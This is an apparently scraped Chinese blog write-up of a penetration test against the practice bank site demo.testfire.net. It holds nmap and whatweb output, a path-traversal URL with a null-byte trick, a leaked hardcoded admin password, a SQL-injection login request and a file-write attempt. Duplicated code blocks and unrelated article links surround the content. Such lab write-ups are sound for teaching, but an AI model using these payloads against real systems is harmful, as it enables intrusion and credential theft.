demo.testfire.net

span::selection, .CodeMirror-line > span > span::selection { background: #d7d4f0; }.CodeMirror-line::-moz-selection, .CodeMirror-line > span::-moz-selection, .CodeMirror-line > span > span::-moz-selection { background: #d7d4f0; }.cm-searching {background: #ffa; background: rgba(255, 255, 0, .4);}.cm-force-border { padding-right: .1px; }@media print { .CodeMirror div.CodeMirror-cursors {visibility: hidden;}}.cm-tab-wrap-hack:after { content: ""; }span.CodeMirror-selectedtext { background: none; }.CodeMirror-activeline-background, .CodeMirror-selected {transition: visibility 0ms 100ms;}.CodeMirror-blur .CodeMirror-activeline-background, .CodeMirror-blur .CodeMirror-selected {visibility:hidden;}.CodeMirror-blur .CodeMirror-matchingbracket {color:inherit !important;outline:none !important;text-decoration:none !important;}.CodeMirror-sizer {min-height:auto !important;}
-->
li {list-style-type:decimal;}.wiz-editor-body ol.wiz-list-level2 > li {list-style-type:lower-latin;}.wiz-editor-body ol.wiz-list-level3 > li {list-style-type:lower-roman;}.wiz-editor-body blockquote {padding: 0 12px;}.wiz-editor-body blockquote > :first-child {margin-top:0;}.wiz-editor-body blockquote > :last-child {margin-bottom:0;}.wiz-editor-body img {border:0;max-width:100%;height:auto !important;margin:2px 0;}.wiz-editor-body table {border-collapse:collapse;border:1px solid #bbbbbb;}.wiz-editor-body td,.wiz-editor-body th {padding:4px 8px;border-collapse:collapse;border:1px solid #bbbbbb;min-height:28px;word-break:break-word;box-sizing: border-box;}.wiz-hide {display:none !important;}
-->

信息搜集

域名

IP 端口信息

65.61.137.117

 
 
 
1
 
 
 
 
 
1
65.61.137.117
2














 


 








 


nmap 信息


root@kali:~/security_tools/recon_tools/gwhatweb# nmap -Pn -A  65.61.137.117

Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-18 02:22 EDT

Nmap scan report for 65.61.137.117

Host is up (0.60s latency).

Not shown: 995 closed ports

PORT     STATE    SERVICE      VERSION

80/tcp   open     http         Microsoft IIS httpd 8.0

| http-cookie-flags:

|   /:

|     amSessionId:

|_      httponly flag not set

| http-methods:

|_  Potentially risky methods: TRACE

|_http-server-header: Microsoft-IIS/8.0

|_http-title: Altoro Mutual

443/tcp  open     ssl/http     Microsoft IIS httpd 8.0

| http-cookie-flags:

|   /:

|     amSessionId:

|_      httponly flag not set

| http-methods:

|_  Potentially risky methods: TRACE

|_http-server-header: Microsoft-IIS/8.0

|_http-title: Altoro Mutual

| ssl-cert: Subject: commonName=demo.testfire.net

| Not valid before: 2014-07-01T09:54:37

|_Not valid after:  2019-12-22T09:54:37

|_ssl-date: 2018-08-18T07:23:19+00:00; +58m04s from scanner time.

445/tcp  filtered microsoft-ds

514/tcp  filtered shell

4444/tcp filtered krb524

Device type: general purpose

Running: Microsoft Windows XP|7|2012

OS CPE: cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_server_2012

OS details: Microsoft Windows XP SP3, Microsoft Windows XP SP3 or Windows 7 or Windows Server 2012

Network Distance: 2 hops

Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows


Host script results:

|_clock-skew: mean: 58m03s, deviation: 0s, median: 58m03s


TRACEROUTE (using port 1723/tcp)

HOP RTT      ADDRESS

1   5.10 ms  192.168.245.2

2   26.32 ms 65.61.137.117


OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 183.49 seconds




 


 


 














x




 


 




 








 


 




1




root@kali:~/security_tools/recon_tools/gwhatweb# nmap -Pn -A  65.61.137.117








2




Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-18 02:22 EDT








3




Nmap scan report for 65.61.137.117








4




Host is up (0.60s latency).








5




Not shown: 995 closed ports








6




PORT     STATE    SERVICE      VERSION








7




80/tcp   open     http         Microsoft IIS httpd 8.0








8




| http-cookie-flags: 








9




|   /: 








10




|     amSessionId: 








11




|_      httponly flag not set








12




| http-methods: 








13




|_  Potentially risky methods: TRACE








14




|_http-server-header: Microsoft-IIS/8.0








15




|_http-title: Altoro Mutual








16




443/tcp  open     ssl/http     Microsoft IIS httpd 8.0








17




| http-cookie-flags: 








18




|   /: 








19




|     amSessionId: 








20




|_      httponly flag not set








21




| http-methods: 








22




|_  Potentially risky methods: TRACE








23




|_http-server-header: Microsoft-IIS/8.0








24




|_http-title: Altoro Mutual








25




| ssl-cert: Subject: commonName=demo.testfire.net








26




| Not valid before: 2014-07-01T09:54:37








27




|_Not valid after:  2019-12-22T09:54:37








28




|_ssl-date: 2018-08-18T07:23:19+00:00; +58m04s from scanner time.








29




445/tcp  filtered microsoft-ds








30




514/tcp  filtered shell








31




4444/tcp filtered krb524








32




Device type: general purpose








33




Running: Microsoft Windows XP|7|2012








34




OS CPE: cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_server_2012








35




OS details: Microsoft Windows XP SP3, Microsoft Windows XP SP3 or Windows 7 or Windows Server 2012








36




Network Distance: 2 hops








37




Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows








38












39




Host script results:








40




|_clock-skew: mean: 58m03s, deviation: 0s, median: 58m03s








41












42




TRACEROUTE (using port 1723/tcp)








43




HOP RTT      ADDRESS








44




1   5.10 ms  192.168.245.2








45




2   26.32 ms 65.61.137.117








46












47




OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .








48




Nmap done: 1 IP address (1 host up) scanned in 183.49 seconds








49


















 


 








中间件


root@kali:~/security_tools/file_scan/dirsearch# whatweb http://demo.testfire.net/

http://demo.testfire.net/ [200 OK] ASP_NET[2.0.50727], Cookies[ASP.NET_SessionId,amSessionId], Country[UNITED STATES][US], HTTPServer[Microsoft-IIS/8.0], HttpOnly[ASP.NET_SessionId], IP[65.61.137.117], Microsoft-IIS[8.0], Title[Altoro Mutual][Title element contains newline(s)!], X-Powered-By[ASP.NET]




 


 


 














x




 


 




 








 


 




1




root@kali:~/security_tools/file_scan/dirsearch# whatweb http://demo.testfire.net/








2




http://demo.testfire.net/ [200 OK] ASP_NET[2.0.50727], Cookies[ASP.NET_SessionId,amSessionId], Country[UNITED STATES][US], HTTPServer[Microsoft-IIS/8.0], HttpOnly[ASP.NET_SessionId], IP[65.61.137.117], Microsoft-IIS[8.0], Title[Altoro Mutual][Title element contains newline(s)!], X-Powered-By[ASP.NET]














 


 








总结




  • windows 服务器 , asp.net (aspx) . iis8
    • 

  • 靶机网站, 域名, cdn 等信息无需搜集




 


漏洞挖掘


错误日志,泄露物理路径


GET 请求访问 http://demo.testfire.net/comment.aspx






 


 


 












 


 


 




 








 


 




1




An Error Has Occurred








2




Summary:








3




Value cannot be null.








4












5




Error Message:








6




System.ArgumentNullException: Value cannot be null. Parameter name: input at System.Text.RegularExpressions.Regex.IsMatch(String input) at System.Text.RegularExpressions.Regex.IsMatch(String input, String pattern) at Altoro.comment.writeToFile(String file, String name, String email_addr, String subject, String comments) in c:\downloads\AltoroMutual_v6\website\comment.aspx.cs:line 31 at Altoro.comment.Page_Load(Object sender, EventArgs e) in c:\downloads\AltoroMutual_v6\website\comment.aspx.cs:line 27 at System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e) at System.Web.Util.CalliEventHandlerDelegateProxy.Callback(Object sender, EventArgs e) at System.Web.UI.Control.OnLoad(EventArgs e) at System.Web.UI.Control.LoadRecursive() at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)














 


 








 


疑似程序路径


c:\downloads\AltoroMutual_v6\website\comment.aspx.cs:line 31




 


 


 














x




 


 




 








 


 




1




c:\downloads\AltoroMutual_v6\website\comment.aspx.cs:line 31














 


 








 


登录处无验证码 ( maybe 暴力破解)






 


 


 














x




 


 




 








 


 




1




http://www.altoromutual.com/bank/login.aspx














 


 








 


任意文件内容读取


 


查看 login.aspx 的源代码






 


 


 














x




 


 




 








 


 




1




http://demo.testfire.net/default.aspx?content=../bank/login.aspx.cs%00.txt














 


 








给出不存在的文件会报出目录信息


Could not find file 'C:\downloads\AltoroMutual_v6\website\bank\login.aspx.cs,'

        System.IO.FileNotFoundException: Could not find file 'C:\downloads\AltoroMutual_v6\website\bank\login.aspx.cs,'.

            File name: 'C:\downloads\AltoroMutual_v6\website\bank\login.aspx.cs,'

            at System.IO.__Error.WinIOError(Int32 errorCode, String maybeFullPath)

            at System.IO.FileStream.Init(String path, FileMode mode, FileAccess access, Int32 rights, Boolean useRights, FileShare share, Int32 bufferSize, FileOptions options, SECURITY_ATTRIBUTES secAttrs, String msgPath, Boolean bFromProxy)

            at System.IO.FileStream..ctor(String path, FileMode mode, FileAccess access, FileShare share, Int32 bufferSize, FileOptions options)

            at System.IO.StreamReader..ctor(String path, Encoding encoding, Boolean detectEncodingFromByteOrderMarks, Int32 bufferSize)

            at System.IO.StreamReader..ctor(String path)

            at System.IO.File.OpenText(String path)

            at Altoro.Default.LoadFile(String myFile) in c:\downloads\AltoroMutual_v6\website\default.aspx.cs:line 42

            at Altoro.Default.Page_Load(Object sender, EventArgs e) in c:\downloads\AltoroMutual_v6\website\default.aspx.cs:line 70

            at System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e)

            at System.Web.Util.CalliEventHandlerDelegateProxy.Callback(Object sender, EventArgs e)

            at System.Web.UI.Control.OnLoad(EventArgs e)

            at System.Web.UI.Control.LoadRecursive()

            at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)




 


 


 












 


 


 




 








 


 




1




Could not find file 'C:\downloads\AltoroMutual_v6\website\bank\login.aspx.cs,'








2




        System.IO.FileNotFoundException: Could not find file 'C:\downloads\AltoroMutual_v6\website\bank\login.aspx.cs,'.








3




            File name: 'C:\downloads\AltoroMutual_v6\website\bank\login.aspx.cs,'








4




            at System.IO.__Error.WinIOError(Int32 errorCode, String maybeFullPath)








5




            at System.IO.FileStream.Init(String path, FileMode mode, FileAccess access, Int32 rights, Boolean useRights, FileShare share, Int32 bufferSize, FileOptions options, SECURITY_ATTRIBUTES secAttrs, String msgPath, Boolean bFromProxy)








6




            at System.IO.FileStream..ctor(String path, FileMode mode, FileAccess access, FileShare share, Int32 bufferSize, FileOptions options)








7




            at System.IO.StreamReader..ctor(String path, Encoding encoding, Boolean detectEncodingFromByteOrderMarks, Int32 bufferSize)








8




            at System.IO.StreamReader..ctor(String path)








9




            at System.IO.File.OpenText(String path)








10




            at Altoro.Default.LoadFile(String myFile) in c:\downloads\AltoroMutual_v6\website\default.aspx.cs:line 42








11




            at Altoro.Default.Page_Load(Object sender, EventArgs e) in c:\downloads\AltoroMutual_v6\website\default.aspx.cs:line 70








12




            at System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e)








13




            at System.Web.Util.CalliEventHandlerDelegateProxy.Callback(Object sender, EventArgs e)








14




            at System.Web.UI.Control.OnLoad(EventArgs e)








15




            at System.Web.UI.Control.LoadRecursive()








16




            at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)














 


 








 


读取 /admin/login.aspx 的源码 拿到 管理员的密码


if (this.CodeNumberTextBox.Text == this.Session["CaptchaImageText"].ToString() && this.Password.Value == "Altoro1234")




 


 


 














x




 


 




 








 


 




1




if (this.CodeNumberTextBox.Text == this.Session["CaptchaImageText"].ToString() && this.Password.Value == "Altoro1234") 














 


 








SQL 注入


POST /bank/login.aspx HTTP/1.1

Host: demo.testfire.net

Content-Length: 45

Cache-Control: max-age=0

Origin: http://demo.testfire.net

Upgrade-Insecure-Requests: 1

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8

Referer: http://demo.testfire.net/bank/login.aspx

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9,en;q=0.8

Cookie: ASP.NET_SessionId=dtutsf550envk5alwwnkd045; amSessionId=15719430288

Connection: close


uid=hac425%27&passw=%27%27%27&btnSubmit=Login




 


 


 












 


 


 




 








 


 




1




POST /bank/login.aspx HTTP/1.1








2




Host: demo.testfire.net








3




Content-Length: 45








4




Cache-Control: max-age=0








5




Origin: http://demo.testfire.net








6




Upgrade-Insecure-Requests: 1








7




Content-Type: application/x-www-form-urlencoded








8




User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36








9




Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8








10




Referer: http://demo.testfire.net/bank/login.aspx








11




Accept-Encoding: gzip, deflate








12




Accept-Language: zh-CN,zh;q=0.9,en;q=0.8








13




Cookie: ASP.NET_SessionId=dtutsf550envk5alwwnkd045; amSessionId=15719430288








14




Connection: close








15












16




uid=hac425%27&passw=%27%27%27&btnSubmit=Login














 


 








 


写文件


貌似只能写 txt , 写 aspx 访问不了


POST /comment.aspx HTTP/1.1

Host: www.altoromutual.com

Content-Length: 111

Cache-Control: max-age=0

Origin: http://www.altoromutual.com

Upgrade-Insecure-Requests: 1

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8

Referer: http://www.altoromutual.com/feedback.aspx

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9,en;q=0.8

Cookie: ASP.NET_SessionId=pods4fz2zs5fdh55xmwwkg55; amSessionId=21554438004

Connection: close


cfile=comment.txt&name=+hac425&email_addr=11%4011.com&subject=sss&comments=kkkkkkkkkkkkkkkkkkkk&submit=+Submit+




 


 


 














x




 


 




 








 


 




1




POST /comment.aspx HTTP/1.1








2




Host: www.altoromutual.com








3




Content-Length: 111








4




Cache-Control: max-age=0








5




Origin: http://www.altoromutual.com








6




Upgrade-Insecure-Requests: 1








7




Content-Type: application/x-www-form-urlencoded








8




User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36








9




Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8








10




Referer: http://www.altoromutual.com/feedback.aspx








11




Accept-Encoding: gzip, deflate








12




Accept-Language: zh-CN,zh;q=0.9,en;q=0.8








13




Cookie: ASP.NET_SessionId=pods4fz2zs5fdh55xmwwkg55; amSessionId=21554438004








14




Connection: close








15












16




cfile=comment.txt&name=+hac425&email_addr=11%4011.com&subject=sss&comments=kkkkkkkkkkkkkkkkkkkk&submit=+Submit+














 


 








 


 


 


 


 


 


 


 


 
												


											
demo.testfire.net 靶场测试流程记录的更多相关文章
	

    
								
  1. 利用cocoapods管理开源项目,支持 pod install安装整个流程记录(github公有库)
		
    利用cocoapods管理开源项目,支持 pod install安装整个流程记录(github公有库),完成预期的任务,大致有下面几步: 1.代码提交到github平台 2.创建.podspec 3. ...
    
		
    2. 
						
  2. 互联网App应用程序测试流程及测试总结
		
    互联网App应用程序测试流程及测试总结 1. APP测试基本流程 1.1流程图 仍然为测试环境 Pass 1.2测试周期 测试周期可按项目的开发周期来确定测试时间,一般测试时间为两三周(即15个工作日 ...
    
		
    3. 
						
  3. web测试流程的总结及关注点
		
    项目的测试流程大只包含的几个阶段:立项.需求评审.用例评审.测试执行.测试报告文档 一.立项后测试需要拿到的文档 1.需求说明书 2.原型图(及UI图) 3.接口文档 4.数据库字典(表的数量.缓存机 ...
    
		
    4. 
						
  4. 抓包工具 Fiddler 使用:弱网络环境模拟限速测试流程
		
    转自:http://www.51testing.com/html/80/n-3726980.html   抓包工具 Fiddler 使用:弱网络环境模拟限速测试流程 发表于:2018-6-06 11: ...
    
		
    5. 
						
  5. web手工项目01-系统组织框架-测试流程-需求评审-测试计划与方案
		
    回顾 SVN(定义,作用,使用操作) 软件缺陷(定义,表现形式,原因和根源,基本内容,跟踪流程) JIRA(基本介绍,使用者,工作流,问题,使用) 学习目标 掌握WAMP的环境搭建 掌握熟悉项目的步骤 ...
    
		
    6. 
						
  6. APP测试流程梳理
		
    APP测试流程梳理 1 APP测试基本流程 1.1流程图 1.2测试周期 测试周期可按项目的开发周期来确定测试时间,一般测试时间为两三周(即15个工作日),根据项目情况以及版本质量可适当缩短或延长测试 ...
    
		
    7. 
						
  7. 【转载】基于RedHatEnterpriseLinux V7(RHEL7)下SPEC CPU 2006环境搭建以及测试流程(之一)——介绍、安装准备、安装、config文件以及运行脚本介绍
		
    基于RedHatEnterpriseLinux V7(RHEL7)下SPEC CPU 2006环境搭建以及测试流程(之一)--介绍.安装准备.安装.config文件以及运行脚本介绍 其他 2018-0 ...
    
		
    8. 
						
  8. ltp 测试流程及测试脚本分析
		
    LTP介绍 (2011-03-25 18:03:53) 转载▼ 标签: ltp linux 压力测试 杂谈 分类: linux测试 LTP介绍 一.LTP介绍1.简介LTP(Linux Test Pr ...
    
		
    9. 
						
  9. 【腾讯优测干货分享】如何降低App的待机内存(二)——规范测试流程及常见问题
		
    本文来自于腾讯优测公众号(wxutest),未经作者同意,请勿转载,原文地址:https://mp.weixin.qq.com/s/806TiugiSJvFI7fH6eVA5w 作者:腾讯TMQ专项测 ...
    
		
    10. 
		

	


随机推荐
	

    
									
  1. 【xsy3423】党²  线段树+李超线段树or动态半平面交
			
    本来并不打算出原创题的,此题集CF542A和sk的灵感而成,算个半原创吧. 题目大意: 给定有$n$个元素的集合$P$,其中第$i$个元素中包含$L_i,R_i,V_i$三个值. 给定另一个有$n$个 ...
    
			
    2. 
						
  2. POJ 1102
			
    #include<iostream>// cheng da cai zi 11.14 using namespace std; int main() { int i; int j; int ...
    
			
    3. 
						
  3. 获取设备信息——获取客户端ip地址和mac地址
			
    1.获取本地IP(有可能是 内网IP,192.168.xxx.xxx) /** * 获取本地IP * * @return */ public static String getLocalIpAddre ...
    
			
    4. 
						
  4. JDK1.10+scala环境的搭建之linux环境(centos6.9)
			
    ---恢复内容开始--- 第一步:安装jdk1.10版本 进入网页 http://oracle.com/technetwork/java/javase/downloads/index.html  下载 ...
    
			
    5. 
						
  5. python字符串中包含Unicode插入数据库乱码问题                                                       分类:            Python             2015-04-28 18:19    342人阅读    评论(0)    收藏
			
    之前在编码的时候遇到一个奇葩的问题,无论如何操作,写入数据库的字符都是乱码,之后是这样解决的,意思就是先解码,然后再插入数据库 cost_str = json.dumps(cost_info) cos ...
    
			
    6. 
						
  6. Spring Boot 使用Redis
			
    转载自:http://www.cnblogs.com/ityouknow/p/5748830.html Redis支持更丰富的数据结构,例如hashes, lists, sets等,同时支持数据持久化 ...
    
			
    7. 
						
  7. PTA (Advanced Level) 1024 Palindromic Number
			
    Palindromic Number A number that will be the same when it is written forwards or backwards is known  ...
    
			
    8. 
						
  8. json对象按时间排序
			
    //正序var data = {"rows": [{"name": "张三","time": "2011/4/ ...
    
			
    9. 
						
  9. rails跳过回调的方法
			
    rails中的回调可跳过,使用下列方法即可: decrement decrement_counter delete delete_all increment increment_counter tog ...
    
			
    10. 
						
  10. HTML5的拖放事件
			
    1.给标签添加属性draggable=ture即可允许拖放,有些标签可以不加,例如img有图片.a有url,默认拥有拖放功能 2.事件在被拖动元素上触发 ondragstart ondrag ondr ...
    
			
    11.